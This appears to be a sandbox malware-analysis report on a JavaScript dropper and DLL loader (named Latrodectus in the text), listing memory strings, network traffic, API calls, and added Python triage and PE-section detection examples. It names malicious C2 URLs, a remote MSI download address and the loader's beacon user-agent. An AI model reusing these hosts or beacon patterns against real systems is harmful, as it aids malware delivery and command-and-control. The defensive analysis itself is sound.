Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53F7000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enc
Source: rundll32.exe String found in binary or memory: http://dr.f.360.cn/scan
Source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr String found in binary or memory: http://dr.f.360.cn/scanlist
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp, MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2158054345.00000207B4D00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: wscript.exe, 00000000.00000002.2158359070.00000207B5000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/gsgccr4(
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: rundll32.exe String found in binary or memory: http://pconf.f.360.cn/safe_update.php
Source: rundll32.exe String found in binary or memory: http://pscan.f.360.cn/safe_update.php
Source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr String found in binary or memory: http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie
Source: rundll32.exe String found in binary or memory: http://sconf.f.360.cn/client_security_conf
Source: wscript.exe, 00000000.00000002.2158359070.00000207B5000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign
Source: wscript.exe, 00000000.00000003.2040677735.00000207B542C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/Q
Source: wscript.exe, 00000000.00000003.2040677735.00000207B542C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/T
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2040569360.00000207B544C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp, C5C8CC0A7FE31816B4641D04654025600.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: wscript.exe, 00000000.00000003.2040677735.00000207B5427000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com:80/cacert/codesigningrootr45.crtdllI
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr String found in binary or memory: http://t2.symcb.com0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr String found in binary or memory: http://tl.symcd.com0&
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com//-cY
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/Ep
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/Qc-
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3308260791.00000201DCA70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3308360157.00000201DCA30000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/)
Source: rundll32.exe, 00000007.00000003.3308360157.00000201DCA30000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/URLS1https://pewwhranet.com/live/COMMAND4front://sysinfo.bin
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/ll
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA98F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/
Source: rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/W
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9B8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA98F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA98F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/7
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/7aB
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/D
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/g5
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA918000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/onsG
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/zedv5
Source: rundll32.exe, 00000007.00000003.3308260791.00000201DCA70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3308360157.00000201DCA30000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/live/
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr String found in binary or memory: https://www.advancedinstaller.com
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: wscript.exe, 00000000.00000002.2158359070.00000207B5000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repo
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr String found in binary or memory: https://www.thawte.com/cps0/
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr String found in binary or memory: https://www.thawte.com/repository0W
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown HTTPS traffic detected: 172.67.136.103:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.59.82:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C5C8CC0A7FE31816B4641D0465402560
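Most of the URL strings above are memory residue pointing at certificate-revocation, timestamping and update infrastructure pulled in by signature checks and the MSI engine; only a handful of hosts belong to the loader itself. The Python below is an added triage example, not part of the sandbox report: it reduces a constructed excerpt of those lines to hosts, drops an analyst allowlist of such infrastructure (the suffix list is an assumption, and it includes the 360.cn hosts that appear in the dropped 360total.dll strings), and then matches the two request shapes the report recorded, the msiexec fetch of ad.msi from a bare IP with the "Windows Installer" user-agent and the POST /live/ check-in with the fixed "Mozilla/4.0 (... Tob 1.1)" user-agent. The request bodies and the benign control request are constructed.

```python
"""Triage of the network findings above: collapse URL strings to hosts, separate
certificate/update infrastructure from C2 candidates, and match the two HTTP request
shapes the report recorded (remote MSI fetch and /live/ beacon)."""
import re
from typing import Dict, List, Set

# Constructed excerpt of the report's network lines (source fields trimmed; not a
# live capture). Trailing bytes such as "0U" are memory-string residue the sandbox
# prints verbatim, which is why only the host part is extracted below.
REPORT_LINES = [
    "Source: wscript.exe String found in binary or memory: http://45.95.11.217/ad.msi",
    "Source: MSI39EE.tmp.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0",
    "Source: wscript.exe String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U",
    "Source: wscript.exe String found in binary or memory: http://secure.globalsign.com:80/cacert/codesigningrootr45.crtdllI",
    "Source: rundll32.exe String found in binary or memory: http://pscan.f.360.cn/safe_update.php",
    "Source: rundll32.exe String found in binary or memory: https://grizmotras.com/live/URLS1https://pewwhranet.com/live/COMMAND4front://sysinfo.bin",
    "Source: rundll32.exe String found in binary or memory: https://jarinamaers.shop/live/7aB",
    "Source: global traffic DNS traffic detected: DNS query: jarinamaers.shop",
]

# Analyst allowlist (assumption, not from the report): code-signing, revocation,
# timestamping and update hosts that signature checks and msiexec contact anyway.
INFRA_SUFFIXES = ("digicert.com", "globalsign.com", "symcb.com", "symcd.com",
                  "windowsupdate.com", "thawte.com", "advancedinstaller.com", "360.cn")

URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
LATRODECTUS_UA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)"


def extract_hosts(lines: List[str]) -> Set[str]:
    """Every host named in an http(s):// string; concatenated config strings yield several."""
    return {m.group(1).lower() for line in lines for m in URL_HOST.finditer(line)}


def is_infra(host: str) -> bool:
    return any(host == s or host.endswith("." + s) for s in INFRA_SUFFIXES)


def c2_candidates(lines: List[str]) -> Set[str]:
    """Hosts left after removing allowlisted infrastructure."""
    return {h for h in extract_hosts(lines) if not is_infra(h)}


def parse_request(raw: str) -> Dict:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for hl in header_lines:
        name, _, value = hl.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def match_request(req: Dict, c2_hosts: Set[str]) -> List[str]:
    """Reasons this request matches the observed chain; an empty list means no match."""
    h, reasons = req["headers"], []
    host = h.get("host", "").split(":")[0].lower()
    if host in c2_hosts:
        reasons.append(f"host {host} is a C2 candidate from the sample's strings")
    # Stage 1: msiexec pulling the installer from an IP literal (no DNS lookup).
    if (req["method"] == "GET" and req["path"].lower().endswith(".msi")
            and h.get("user-agent") == "Windows Installer" and IPV4.match(host)):
        reasons.append("msiexec remote MSI fetch from IP literal")
    # Stage 2: the loader's /live/ check-in with its fixed IE7-on-XP user-agent.
    if (req["method"] == "POST" and req["path"].rstrip("/") == "/live"
            and h.get("user-agent") == LATRODECTUS_UA
            and h.get("content-type", "").startswith("application/x-www-form-urlencoded")):
        reasons.append("Latrodectus /live/ beacon")
    return reasons


# Constructed requests shaped like the two the report recorded, plus a benign control.
MSI_FETCH = ("GET /ad.msi HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\n"
             "User-Agent: Windows Installer\r\nHost: 45.95.11.217\r\n\r\n")
BEACON = ("POST /live/ HTTP/1.1\r\nAccept: */*\r\n"
          "Content-Type: application/x-www-form-urlencoded\r\n"
          f"User-Agent: {LATRODECTUS_UA}\r\nHost: jarinamaers.shop\r\n"
          "Content-Length: 252\r\nCache-Control: no-cache\r\n\r\n" + "A" * 252)
BENIGN = "GET / HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"

if __name__ == "__main__":
    c2 = c2_candidates(REPORT_LINES)
    print("C2 candidates:", sorted(c2))
    for raw in (MSI_FETCH, BEACON, BENIGN):
        req = parse_request(raw)
        print(req["method"], req["path"], "->", match_request(req, c2) or "no match")
```

The host-only extraction is deliberate: the sandbox prints whatever bytes followed the URL in memory, so matching on full URLs from these lines would produce indicators like "ocsp.digicert.com0A" that never appear on the wire. The two request matchers are independent of the host list, so they still fire on a new campaign that rotates domains but keeps the MSI delivery and the /live/ check-in.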

System Summary

Source: 360total.dll.2.dr Static PE information: section name: yhDm^
Source: Update_3b24da5a.dll.6.dr Static PE information: section name: yhDm^
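The section name yhDm^ in both dropped DLLs is what the "PE file contains section with special chars" signature keys on: linkers emit names from a small printable alphabet, and a name outside it is a cheap triage signal for a packed or hand-built image. The Python below is an added example that is not part of the report: it walks the section table of a PE image with the standard library only and flags names outside that alphabet. It runs on a constructed minimal stub carrying the same section name, not on the dropped DLL itself; the allowed character set is an assumption, and some packers use unusual but harmless names, so treat a hit as a hint rather than a verdict.

```python
"""Flag PE sections whose names fall outside the printable, linker-style alphabet,
the check behind the report's "section with special chars" signature."""
import struct
from typing import List

PE_SIG = b"PE\0\0"
# Assumption: characters a mainstream linker will put in a section name.
ALLOWED = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._$")


def section_names(pe: bytes) -> List[str]:
    """DOS header -> e_lfanew -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE image (missing MZ)")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != PE_SIG:
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4                                   # 20-byte COFF file header
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]  # SizeOfOptionalHeader
    table = coff + 20 + opt_size                          # first 40-byte section header
    names = []
    for i in range(num_sections):
        raw = pe[table + 40 * i: table + 40 * i + 8]      # Name is the first 8 bytes
        names.append(raw.split(b"\0", 1)[0].decode("latin-1"))
    return names


def suspicious_sections(pe: bytes) -> List[str]:
    """Empty names or names with characters outside ALLOWED (e.g. 'yhDm^')."""
    return [n for n in section_names(pe) if not n or any(c not in ALLOWED for c in n)]


def build_stub_pe(names: List[str]) -> bytes:
    """Constructed minimal image: DOS stub, PE signature, x64 COFF header with an empty
    optional header, and one zeroed section header per name. Enough for the section
    walk above; it is not a loadable binary."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                 # e_lfanew points just past the stub
    coff = struct.pack("<HHIIIHH", 0x8664, len(names), 0, 0, 0, 0, 0x2022)
    headers = b"".join(n.encode("latin-1").ljust(8, b"\0") + bytes(32) for n in names)
    return bytes(dos) + PE_SIG + coff + headers


if __name__ == "__main__":
    sample = build_stub_pe([".text", ".rdata", "yhDm^"])
    print("sections:", section_names(sample))
    print("suspicious:", suspicious_sections(sample))
```

On a real file, read the bytes and call suspicious_sections on them directly; the stub builder exists only so the example runs offline. Names such as UPX0 or .gfids pass the check, which is intended: the signal is the character set, not an allowlist of known names.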
Source: Document_a19_79b555791-28h97348k5477-3219g9.js Static file information: Suspicious name
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC8578C0 NtReadFile, 6_2_00000187EC8578C0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC857A54 NtWriteFile, 6_2_00000187EC857A54
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC8579C8 NtClose, 6_2_00000187EC8579C8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC857B40 NtFreeVirtualMemory, 6_2_00000187EC857B40
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC857588 RtlInitUnicodeString,NtCreateFile,NtClose, 6_2_00000187EC857588
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC85378C NtClose, 6_2_00000187EC85378C
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC8577B0 RtlInitUnicodeString,NtCreateFile, 6_2_00000187EC8577B0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC85B0C4 NtOpenKey,RtlpNtOpenKey, 6_2_00000187EC85B0C4
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC85B1D4 NtQueryValueKey,NtQueryValueKey,NtClose, 6_2_00000187EC85B1D4
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC85AD34 NtAllocateVirtualMemory, 6_2_00000187EC85AD34
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC85463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification, 6_2_00000187EC85463C
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC857ACC NtClose, 6_2_00000187EC857ACC
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC857694 RtlInitUnicodeString,NtDeleteFile, 6_2_00000187EC857694
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC857704 NtQueryInformationFile, 6_2_00000187EC857704
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC85745C RtlInitUnicodeString,NtOpenFile,NtClose, 6_2_00000187EC85745C
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC860A78 NtClose, 6_2_00000187EC860A78
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC860A90 NtDeleteFile, 6_2_00000187EC860A90
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC85CB54 NtDelayExecution, 6_2_00000187EC85CB54
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC860AC0 NtFreeVirtualMemory, 6_2_00000187EC860AC0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000187EC860AF0 NtWriteFile, 6_2_00000187EC860AF0
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAEB0C4 NtOpenKey,RtlpNtOpenKey, 7_2_00000201DAAEB0C4
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAE7A54 NtWriteFile, 7_2_00000201DAAE7A54
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAE463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification, 7_2_00000201DAAE463C
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAE378C NtClose, 7_2_00000201DAAE378C
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAEB1D4 NtQueryValueKey,NtQueryValueKey,NtClose, 7_2_00000201DAAEB1D4
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAE77B0 RtlInitUnicodeString,NtCreateFile, 7_2_00000201DAAE77B0
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAECB54 NtDelayExecution, 7_2_00000201DAAECB54
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAE7B40 NtFreeVirtualMemory, 7_2_00000201DAAE7B40
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAEAD34 NtAllocateVirtualMemory, 7_2_00000201DAAEAD34
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAF0A90 NtDeleteFile, 7_2_00000201DAAF0A90
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAE7694 RtlInitUnicodeString,NtDeleteFile, 7_2_00000201DAAE7694
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAF0A78 NtClose, 7_2_00000201DAAF0A78
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAE7ACC NtClose, 7_2_00000201DAAE7ACC
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAF0AC0 NtFreeVirtualMemory, 7_2_00000201DAAF0AC0
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAE78C0 NtReadFile, 7_2_00000201DAAE78C0
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAE745C RtlInitUnicodeString,NtOpenFile,NtClose, 7_2_00000201DAAE745C
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAE7588 RtlInitUnicodeString,NtCreateFile,NtClose, 7_2_00000201DAAE7588
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAE79C8 NtClose, 7_2_00000201DAAE79C8
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_00000201DAAE7704 NtQueryInformationFile, 7_2_00000201DAAE7704
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A37950AD34 NtAllocateVirtualMemory, 8_2_000001A37950AD34
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A379507B40 NtFreeVirtualMemory, 8_2_000001A379507B40
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A379507694 RtlInitUnicodeString,NtDeleteFile, 8_2_000001A379507694
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A379510AC0 NtFreeVirtualMemory, 8_2_000001A379510AC0
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A3795078C0 NtReadFile, 8_2_000001A3795078C0
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A379507A54 NtWriteFile, 8_2_000001A379507A54
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A37950745C RtlInitUnicodeString,NtOpenFile,NtClose, 8_2_000001A37950745C
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A379507704 NtQueryInformationFile, 8_2_000001A379507704
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A37950B0C4 NtOpenKey, 8_2_000001A37950B0C4
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A379507ACC NtClose, 8_2_000001A379507ACC
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A379507588 RtlInitUnicodeString,NtCreateFile,NtClose, 8_2_000001A379507588
